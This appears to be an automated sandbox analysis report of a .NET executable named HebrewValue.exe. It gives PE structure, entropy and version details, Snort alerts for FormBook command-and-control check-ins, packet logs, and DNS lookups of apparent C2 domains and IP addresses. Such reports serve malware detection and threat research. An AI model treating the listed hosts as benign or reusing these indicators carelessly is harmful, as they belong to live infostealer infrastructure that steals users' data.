                                                              Instruction
                                                              jmp dword ptr [00402000h]
                                                              add dword ptr [eax], eax
                                                              add byte ptr [eax], al
                                                              add al, byte ptr [eax]
                                                              add byte ptr [eax], al
                                                              or byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              or eax, 0C000000h
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax+eax], al
                                                              add byte ptr [eax], al
                                                              pop es
                                                              add byte ptr [eax], al
                                                              add byte ptr [esi], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [edx], cl
                                                              add byte ptr [eax], al
                                                              add byte ptr [esi], cl
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], cl
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax+eax], cl
                                                              add byte ptr [eax], al
                                                              push cs
                                                              add byte ptr [eax], al
                                                              add byte ptr [esi], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [esi], cl
                                                              add byte ptr [eax], al
                                                              add byte ptr [ecx], cl
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], cl
                                                              add byte ptr [eax], al
                                                              add byte ptr [ebx], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [esi], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax+eax], al
                                                              add byte ptr [eax], al
                                                              pop es
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax+eax], cl
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add al, byte ptr [eax]
                                                              add byte ptr [eax], al
                                                              push es
                                                              add byte ptr [eax], al
                                                              add byte ptr [edx], cl
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax+eax], al
                                                              add byte ptr [eax], al
                                                              or al, byte ptr [eax]
                                                              add byte ptr [eax], al
                                                              push cs
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [ecx], cl
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax+eax], cl
                                                              add byte ptr [eax], al
                                                              add eax, 00000000h
                                                              add byte ptr [eax], al
                                                              add byte ptr [ebx], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax+eax], al
                                                              add byte ptr [eax], al
                                                              or eax, dword ptr [eax]
                                                              add byte ptr [eax], al
                                                              or eax, dword ptr [eax]
                                                              add byte ptr [eax], al
                                                              or al, 00h
                                                              add byte ptr [eax], al
                                                              or eax, 02000000h
                                                              add byte ptr [eax], al
                                                              add byte ptr [ecx], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [edx], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [esi], cl
                                                              add byte ptr [eax], al
                                                              add byte ptr [00000000h], al

Data Directories

Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0xa05a0         | 0x4f         | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0xa2000         | 0x5b4        | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0xa4000         | 0xc          | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x2000          | 0x8          | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008          | 0x48         | .text
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |

Sections

Name   | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy         | Characteristics
.text  | 0x2000          | 0x9eb28      | 0x9ec00  | False    | 0.77720226378   | data      | 7.60713416041   | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc  | 0xa2000         | 0x5b4        | 0x600    | False    | 0.421223958333  | data      | 4.09451616704   | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xa4000         | 0xc          | 0x200    | False    | 0.044921875     | data      | 0.0815394123432 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name        | RVA     | Size  | Type                                                                        | Language | Country
RT_VERSION  | 0xa2090 | 0x324 | data                                                                        |          |
RT_MANIFEST | 0xa23c4 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators |          |

Imports

DLL         | Import
mscoree.dll | _CorExeMain

Version Infos

Description      | Data
Translation      | 0x0000 0x04b0
LegalCopyright   | Copyright 2015
Assembly Version | 1.0.0.0
InternalName     | HebrewValue.exe
FileVersion      | 1.0.0.0
CompanyName      |
LegalTrademarks  |
Comments         |
ProductName      | Codewords
ProductVersion   | 1.0.0.0
FileDescription  | Codewords
OriginalFilename | HebrewValue.exe

Network Behavior

Snort IDS Alerts

Timestamp                | Protocol | SID     | Message                             | Source Port | Dest Port | Source IP       | Dest IP
04/08/21-11:05:00.881786 | TCP      | 1201    | ATTACK-RESPONSES 403 Forbidden      | 80          | 49718     | 34.102.136.180  | 192.168.2.5
04/08/21-11:05:11.863981 | TCP      | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49727       | 80        | 192.168.2.5     | 52.58.78.16
04/08/21-11:05:11.863981 | TCP      | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49727       | 80        | 192.168.2.5     | 52.58.78.16
04/08/21-11:05:11.863981 | TCP      | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49727       | 80        | 192.168.2.5     | 52.58.78.16
04/08/21-11:05:17.162631 | TCP      | 1201    | ATTACK-RESPONSES 403 Forbidden      | 80          | 49728     | 34.102.136.180  | 192.168.2.5
04/08/21-11:05:39.640341 | TCP      | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49732       | 80        | 192.168.2.5     | 198.148.114.222
04/08/21-11:05:39.640341 | TCP      | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49732       | 80        | 192.168.2.5     | 198.148.114.222
04/08/21-11:05:39.640341 | TCP      | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49732       | 80        | 192.168.2.5     | 198.148.114.222
04/08/21-11:05:44.885165 | TCP      | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49735       | 80        | 192.168.2.5     | 172.67.187.138
04/08/21-11:05:44.885165 | TCP      | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49735       | 80        | 192.168.2.5     | 172.67.187.138
04/08/21-11:05:44.885165 | TCP      | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49735       | 80        | 192.168.2.5     | 172.67.187.138
04/08/21-11:05:50.018144 | TCP      | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49736       | 80        | 192.168.2.5     | 34.102.136.180
04/08/21-11:05:50.018144 | TCP      | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49736       | 80        | 192.168.2.5     | 34.102.136.180
04/08/21-11:05:50.018144 | TCP      | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49736       | 80        | 192.168.2.5     | 34.102.136.180
04/08/21-11:05:50.132700 | TCP      | 1201    | ATTACK-RESPONSES 403 Forbidden      | 80          | 49736     | 34.102.136.180  | 192.168.2.5

Network Port Distribution

TCP Packets

Timestamp                          | Source Port | Dest Port | Source IP       | Dest IP
Apr 8, 2021 11:05:00.753881931 CEST | 49718       | 80        | 192.168.2.5     | 34.102.136.180
Apr 8, 2021 11:05:00.766098022 CEST | 80          | 49718     | 34.102.136.180  | 192.168.2.5
Apr 8, 2021 11:05:00.766237974 CEST | 49718       | 80        | 192.168.2.5     | 34.102.136.180
Apr 8, 2021 11:05:00.766391039 CEST | 49718       | 80        | 192.168.2.5     | 34.102.136.180
Apr 8, 2021 11:05:00.778568983 CEST | 80          | 49718     | 34.102.136.180  | 192.168.2.5
Apr 8, 2021 11:05:00.881786108 CEST | 80          | 49718     | 34.102.136.180  | 192.168.2.5
Apr 8, 2021 11:05:00.882003069 CEST | 80          | 49718     | 34.102.136.180  | 192.168.2.5
Apr 8, 2021 11:05:00.882057905 CEST | 49718       | 80        | 192.168.2.5     | 34.102.136.180
Apr 8, 2021 11:05:00.882086992 CEST | 49718       | 80        | 192.168.2.5     | 34.102.136.180
Apr 8, 2021 11:05:00.894256115 CEST | 80          | 49718     | 34.102.136.180  | 192.168.2.5
Apr 8, 2021 11:05:06.306000948 CEST | 49721       | 80        | 192.168.2.5     | 147.255.37.207
Apr 8, 2021 11:05:06.474500895 CEST | 80          | 49721     | 147.255.37.207  | 192.168.2.5
Apr 8, 2021 11:05:06.474643946 CEST | 49721       | 80        | 192.168.2.5     | 147.255.37.207
Apr 8, 2021 11:05:06.474777937 CEST | 49721       | 80        | 192.168.2.5     | 147.255.37.207
Apr 8, 2021 11:05:06.642904997 CEST | 80          | 49721     | 147.255.37.207  | 192.168.2.5
Apr 8, 2021 11:05:06.645096064 CEST | 80          | 49721     | 147.255.37.207  | 192.168.2.5
Apr 8, 2021 11:05:06.645121098 CEST | 80          | 49721     | 147.255.37.207  | 192.168.2.5
Apr 8, 2021 11:05:06.645370007 CEST | 49721       | 80        | 192.168.2.5     | 147.255.37.207
Apr 8, 2021 11:05:06.807363987 CEST | 49721       | 80        | 192.168.2.5     | 147.255.37.207
Apr 8, 2021 11:05:06.975739956 CEST | 80          | 49721     | 147.255.37.207  | 192.168.2.5
Apr 8, 2021 11:05:11.846038103 CEST | 49727       | 80        | 192.168.2.5     | 52.58.78.16
Apr 8, 2021 11:05:11.863728046 CEST | 80          | 49727     | 52.58.78.16     | 192.168.2.5
Apr 8, 2021 11:05:11.863841057 CEST | 49727       | 80        | 192.168.2.5     | 52.58.78.16
Apr 8, 2021 11:05:11.863981009 CEST | 49727       | 80        | 192.168.2.5     | 52.58.78.16
Apr 8, 2021 11:05:11.881592035 CEST | 80          | 49727     | 52.58.78.16     | 192.168.2.5
Apr 8, 2021 11:05:11.881622076 CEST | 80          | 49727     | 52.58.78.16     | 192.168.2.5
Apr 8, 2021 11:05:11.881633043 CEST | 80          | 49727     | 52.58.78.16     | 192.168.2.5
Apr 8, 2021 11:05:11.881824970 CEST | 49727       | 80        | 192.168.2.5     | 52.58.78.16
Apr 8, 2021 11:05:11.881928921 CEST | 49727       | 80        | 192.168.2.5     | 52.58.78.16
Apr 8, 2021 11:05:11.899434090 CEST | 80          | 49727     | 52.58.78.16     | 192.168.2.5
Apr 8, 2021 11:05:16.970149040 CEST | 49728       | 80        | 192.168.2.5     | 34.102.136.180
Apr 8, 2021 11:05:16.981898069 CEST | 80          | 49728     | 34.102.136.180  | 192.168.2.5
Apr 8, 2021 11:05:16.982042074 CEST | 49728       | 80        | 192.168.2.5     | 34.102.136.180
Apr 8, 2021 11:05:16.982394934 CEST | 49728       | 80        | 192.168.2.5     | 34.102.136.180
Apr 8, 2021 11:05:16.993997097 CEST | 80          | 49728     | 34.102.136.180  | 192.168.2.5
Apr 8, 2021 11:05:17.162631035 CEST | 80          | 49728     | 34.102.136.180  | 192.168.2.5
Apr 8, 2021 11:05:17.162655115 CEST | 80          | 49728     | 34.102.136.180  | 192.168.2.5
Apr 8, 2021 11:05:17.162807941 CEST | 49728       | 80        | 192.168.2.5     | 34.102.136.180
Apr 8, 2021 11:05:17.162939072 CEST | 49728       | 80        | 192.168.2.5     | 34.102.136.180
Apr 8, 2021 11:05:17.177269936 CEST | 80          | 49728     | 34.102.136.180  | 192.168.2.5
Apr 8, 2021 11:05:22.225567102 CEST | 49729       | 80        | 192.168.2.5     | 172.67.219.254
Apr 8, 2021 11:05:22.254049063 CEST | 80          | 49729     | 172.67.219.254  | 192.168.2.5
Apr 8, 2021 11:05:22.258522987 CEST | 49729       | 80        | 192.168.2.5     | 172.67.219.254
Apr 8, 2021 11:05:22.258661032 CEST | 49729       | 80        | 192.168.2.5     | 172.67.219.254
Apr 8, 2021 11:05:22.287576914 CEST | 80          | 49729     | 172.67.219.254  | 192.168.2.5
Apr 8, 2021 11:05:22.638344049 CEST | 80          | 49729     | 172.67.219.254  | 192.168.2.5
Apr 8, 2021 11:05:22.638375998 CEST | 80          | 49729     | 172.67.219.254  | 192.168.2.5
Apr 8, 2021 11:05:22.638386965 CEST | 80          | 49729     | 172.67.219.254  | 192.168.2.5
Apr 8, 2021 11:05:22.638727903 CEST | 49729       | 80        | 192.168.2.5     | 172.67.219.254
Apr 8, 2021 11:05:22.638887882 CEST | 49729       | 80        | 192.168.2.5     | 172.67.219.254
Apr 8, 2021 11:05:27.995213985 CEST | 49731       | 80        | 192.168.2.5     | 15.165.26.252
Apr 8, 2021 11:05:28.222207069 CEST | 80          | 49731     | 15.165.26.252   | 192.168.2.5
Apr 8, 2021 11:05:28.222632885 CEST | 49731       | 80        | 192.168.2.5     | 15.165.26.252
Apr 8, 2021 11:05:28.222840071 CEST | 49731       | 80        | 192.168.2.5     | 15.165.26.252
Apr 8, 2021 11:05:28.449460983 CEST | 80          | 49731     | 15.165.26.252   | 192.168.2.5
Apr 8, 2021 11:05:28.450283051 CEST | 80          | 49731     | 15.165.26.252   | 192.168.2.5
Apr 8, 2021 11:05:28.450304031 CEST | 80          | 49731     | 15.165.26.252   | 192.168.2.5
Apr 8, 2021 11:05:28.450421095 CEST | 49731       | 80        | 192.168.2.5     | 15.165.26.252
Apr 8, 2021 11:05:28.450448036 CEST | 80          | 49731     | 15.165.26.252   | 192.168.2.5
Apr 8, 2021 11:05:28.450572968 CEST | 80          | 49731     | 15.165.26.252   | 192.168.2.5
Apr 8, 2021 11:05:28.450589895 CEST | 80          | 49731     | 15.165.26.252   | 192.168.2.5
Apr 8, 2021 11:05:28.450630903 CEST | 49731       | 80        | 192.168.2.5     | 15.165.26.252
Apr 8, 2021 11:05:28.450726986 CEST | 80          | 49731     | 15.165.26.252   | 192.168.2.5
Apr 8, 2021 11:05:28.450849056 CEST | 80          | 49731     | 15.165.26.252   | 192.168.2.5
Apr 8, 2021 11:05:28.450860023 CEST | 49731       | 80        | 192.168.2.5     | 15.165.26.252
Apr 8, 2021 11:05:28.450865030 CEST | 80          | 49731     | 15.165.26.252   | 192.168.2.5
Apr 8, 2021 11:05:28.450882912 CEST | 80          | 49731     | 15.165.26.252   | 192.168.2.5
Apr 8, 2021 11:05:28.450922012 CEST | 49731       | 80        | 192.168.2.5     | 15.165.26.252
Apr 8, 2021 11:05:28.451035976 CEST | 49731       | 80        | 192.168.2.5     | 15.165.26.252
Apr 8, 2021 11:05:38.876858950 CEST | 49732       | 80        | 192.168.2.5     | 198.148.114.222
Apr 8, 2021 11:05:39.031982899 CEST | 80          | 49732     | 198.148.114.222 | 192.168.2.5
Apr 8, 2021 11:05:39.032156944 CEST | 49732       | 80        | 192.168.2.5     | 198.148.114.222
Apr 8, 2021 11:05:39.640341043 CEST | 49732       | 80        | 192.168.2.5     | 198.148.114.222
Apr 8, 2021 11:05:39.795358896 CEST | 80          | 49732     | 198.148.114.222 | 192.168.2.5
Apr 8, 2021 11:05:39.795466900 CEST | 80          | 49732     | 198.148.114.222 | 192.168.2.5
Apr 8, 2021 11:05:39.795480967 CEST | 80          | 49732     | 198.148.114.222 | 192.168.2.5
Apr 8, 2021 11:05:39.795617104 CEST | 49732       | 80        | 192.168.2.5     | 198.148.114.222
Apr 8, 2021 11:05:39.795866966 CEST | 49732       | 80        | 192.168.2.5     | 198.148.114.222
Apr 8, 2021 11:05:39.950716019 CEST | 80          | 49732     | 198.148.114.222 | 192.168.2.5
Apr 8, 2021 11:05:44.854573965 CEST | 49735       | 80        | 192.168.2.5     | 172.67.187.138
Apr 8, 2021 11:05:44.884535074 CEST | 80          | 49735     | 172.67.187.138  | 192.168.2.5
Apr 8, 2021 11:05:44.884691954 CEST | 49735       | 80        | 192.168.2.5     | 172.67.187.138
Apr 8, 2021 11:05:44.885164976 CEST | 49735       | 80        | 192.168.2.5     | 172.67.187.138
Apr 8, 2021 11:05:44.913573027 CEST | 80          | 49735     | 172.67.187.138  | 192.168.2.5
Apr 8, 2021 11:05:44.938178062 CEST | 80          | 49735     | 172.67.187.138  | 192.168.2.5
Apr 8, 2021 11:05:44.938205004 CEST | 80          | 49735     | 172.67.187.138  | 192.168.2.5
Apr 8, 2021 11:05:44.938432932 CEST | 49735       | 80        | 192.168.2.5     | 172.67.187.138
Apr 8, 2021 11:05:44.938576937 CEST | 49735       | 80        | 192.168.2.5     | 172.67.187.138
Apr 8, 2021 11:05:44.967991114 CEST | 80          | 49735     | 172.67.187.138  | 192.168.2.5
Apr 8, 2021 11:05:50.005429983 CEST | 49736       | 80        | 192.168.2.5     | 34.102.136.180
Apr 8, 2021 11:05:50.017787933 CEST | 80          | 49736     | 34.102.136.180  | 192.168.2.5
                                                              Apr 8, 2021 11:05:50.017981052 CEST4973680192.168.2.534.102.136.180
                                                              Apr 8, 2021 11:05:50.018143892 CEST4973680192.168.2.534.102.136.180
                                                              Apr 8, 2021 11:05:50.030426025 CEST804973634.102.136.180192.168.2.5
                                                              Apr 8, 2021 11:05:50.132699966 CEST804973634.102.136.180192.168.2.5
                                                              Apr 8, 2021 11:05:50.132745028 CEST804973634.102.136.180192.168.2.5
                                                              Apr 8, 2021 11:05:50.134383917 CEST4973680192.168.2.534.102.136.180
                                                              Apr 8, 2021 11:05:50.134418964 CEST4973680192.168.2.534.102.136.180
                                                              Apr 8, 2021 11:05:50.147910118 CEST804973634.102.136.180192.168.2.5

                                                              UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 8, 2021 11:03:45.768506050 CEST | 62060 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 11:03:45.781282902 CEST | 53 | 62060 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 11:03:45.853432894 CEST | 61805 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 11:03:45.866113901 CEST | 53 | 61805 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 11:03:46.795433044 CEST | 54795 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 11:03:46.808278084 CEST | 53 | 54795 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 11:03:48.195389032 CEST | 49557 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 11:03:48.213129997 CEST | 53 | 49557 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 11:03:48.561084032 CEST | 61733 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 11:03:48.573807001 CEST | 53 | 61733 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 11:03:58.365317106 CEST | 65447 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 11:03:58.378695965 CEST | 53 | 65447 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 11:04:00.358462095 CEST | 52441 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 11:04:00.372343063 CEST | 53 | 52441 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 11:04:02.370502949 CEST | 62176 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 11:04:02.383708954 CEST | 53 | 62176 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 11:04:08.876157999 CEST | 59596 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 11:04:08.894535065 CEST | 53 | 59596 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 11:04:10.113761902 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 11:04:10.128612041 CEST | 53 | 65296 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 11:04:12.499480963 CEST | 63183 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 11:04:12.513873100 CEST | 53 | 63183 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 11:04:13.673145056 CEST | 60151 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 11:04:13.686423063 CEST | 53 | 60151 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 11:04:14.710025072 CEST | 56969 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 11:04:14.722381115 CEST | 53 | 56969 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 11:04:21.283379078 CEST | 55161 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 11:04:21.295824051 CEST | 53 | 55161 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 11:04:33.479020119 CEST | 54757 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 11:04:33.497030973 CEST | 53 | 54757 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 11:04:41.631380081 CEST | 49992 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 11:04:41.649642944 CEST | 53 | 49992 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 11:05:00.714267969 CEST | 60075 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 11:05:00.747749090 CEST | 53 | 60075 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 11:05:02.661124945 CEST | 55016 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 11:05:02.673899889 CEST | 53 | 55016 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 11:05:05.897324085 CEST | 64345 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 11:05:06.244898081 CEST | 53 | 64345 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 11:05:10.868768930 CEST | 57128 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 11:05:10.882148981 CEST | 53 | 57128 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 11:05:11.822540998 CEST | 54791 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 11:05:11.844794035 CEST | 53 | 54791 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 11:05:16.929538012 CEST | 50463 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 11:05:16.968993902 CEST | 53 | 50463 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 11:05:22.180048943 CEST | 50394 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 11:05:22.213840961 CEST | 53 | 50394 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 11:05:27.426110029 CEST | 58530 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 11:05:27.460290909 CEST | 53 | 58530 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 11:05:27.659332991 CEST | 53813 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 11:05:27.993830919 CEST | 53 | 53813 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 11:05:33.483378887 CEST | 63732 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 11:05:33.556996107 CEST | 53 | 63732 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 11:05:38.572279930 CEST | 57344 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 11:05:38.862267971 CEST | 53 | 57344 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 11:05:40.617852926 CEST | 54450 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 11:05:40.630655050 CEST | 53 | 54450 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 11:05:42.410048008 CEST | 59261 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 11:05:42.436409950 CEST | 53 | 59261 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 11:05:44.809158087 CEST | 57151 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 11:05:44.853007078 CEST | 53 | 57151 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 11:05:49.980235100 CEST | 59413 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 11:05:50.003463030 CEST | 53 | 59413 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 11:05:55.153040886 CEST | 60516 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 11:05:55.490092039 CEST | 53 | 60516 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 11:06:00.510436058 CEST | 51649 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 11:06:00.623815060 CEST | 53 | 51649 | 8.8.8.8 | 192.168.2.5

                                                              DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Apr 8, 2021 11:05:00.714267969 CEST | 192.168.2.5 | 8.8.8.8 | 0x7430 | Standard query (0) | www.runcouver.com | A (IP address) | IN (0x0001)
Apr 8, 2021 11:05:05.897324085 CEST | 192.168.2.5 | 8.8.8.8 | 0x33ee | Standard query (0) | www.aa29996.com | A (IP address) | IN (0x0001)
Apr 8, 2021 11:05:11.822540998 CEST | 192.168.2.5 | 8.8.8.8 | 0x5155 | Standard query (0) | www.ux300e.com | A (IP address) | IN (0x0001)
Apr 8, 2021 11:05:16.929538012 CEST | 192.168.2.5 | 8.8.8.8 | 0x26e0 | Standard query (0) | www.mvprunning.com | A (IP address) | IN (0x0001)
Apr 8, 2021 11:05:22.180048943 CEST | 192.168.2.5 | 8.8.8.8 | 0x3495 | Standard query (0) | www.getboostphlo.com | A (IP address) | IN (0x0001)
Apr 8, 2021 11:05:27.659332991 CEST | 192.168.2.5 | 8.8.8.8 | 0xfde6 | Standard query (0) | www.okitmall.com | A (IP address) | IN (0x0001)
Apr 8, 2021 11:05:33.483378887 CEST | 192.168.2.5 | 8.8.8.8 | 0x1b1b | Standard query (0) | www.morrealeestates.com | A (IP address) | IN (0x0001)
Apr 8, 2021 11:05:38.572279930 CEST | 192.168.2.5 | 8.8.8.8 | 0xfc66 | Standard query (0) | www.cqsjny.com | A (IP address) | IN (0x0001)
Apr 8, 2021 11:05:44.809158087 CEST | 192.168.2.5 | 8.8.8.8 | 0x28d8 | Standard query (0) | www.betbonusuk.com | A (IP address) | IN (0x0001)
Apr 8, 2021 11:05:49.980235100 CEST | 192.168.2.5 | 8.8.8.8 | 0x31e7 | Standard query (0) | www.yashaerotech.com | A (IP address) | IN (0x0001)
Apr 8, 2021 11:05:55.153040886 CEST | 192.168.2.5 | 8.8.8.8 | 0x67 | Standard query (0) | www.gmopanama.com | A (IP address) | IN (0x0001)
Apr 8, 2021 11:06:00.510436058 CEST | 192.168.2.5 | 8.8.8.8 | 0x9958 | Standard query (0) | www.adamspartnership.com | A (IP address) | IN (0x0001)

                                                              DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Apr 8, 2021 11:05:00.747749090 CEST | 8.8.8.8 | 192.168.2.5 | 0x7430 | No error (0) | www.runcouver.com | runcouver.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 11:05:00.747749090 CEST | 8.8.8.8 | 192.168.2.5 | 0x7430 | No error (0) | runcouver.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:05:06.244898081 CEST | 8.8.8.8 | 192.168.2.5 | 0x33ee | No error (0) | www.aa29996.com |  | 147.255.37.207 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:05:11.844794035 CEST | 8.8.8.8 | 192.168.2.5 | 0x5155 | No error (0) | www.ux300e.com |  | 52.58.78.16 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:05:16.968993902 CEST | 8.8.8.8 | 192.168.2.5 | 0x26e0 | No error (0) | www.mvprunning.com | mvprunning.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 11:05:16.968993902 CEST | 8.8.8.8 | 192.168.2.5 | 0x26e0 | No error (0) | mvprunning.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:05:22.213840961 CEST | 8.8.8.8 | 192.168.2.5 | 0x3495 | No error (0) | www.getboostphlo.com |  | 172.67.219.254 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:05:22.213840961 CEST | 8.8.8.8 | 192.168.2.5 | 0x3495 | No error (0) | www.getboostphlo.com |  | 104.21.70.50 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:05:27.993830919 CEST | 8.8.8.8 | 192.168.2.5 | 0xfde6 | No error (0) | www.okitmall.com |  | 15.165.26.252 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:05:33.556996107 CEST | 8.8.8.8 | 192.168.2.5 | 0x1b1b | Name error (3) | www.morrealeestates.com | none | none | A (IP address) | IN (0x0001)
Apr 8, 2021 11:05:38.862267971 CEST | 8.8.8.8 | 192.168.2.5 | 0xfc66 | No error (0) | www.cqsjny.com |  | 198.148.114.222 | A (IP address) | IN (0x0001)
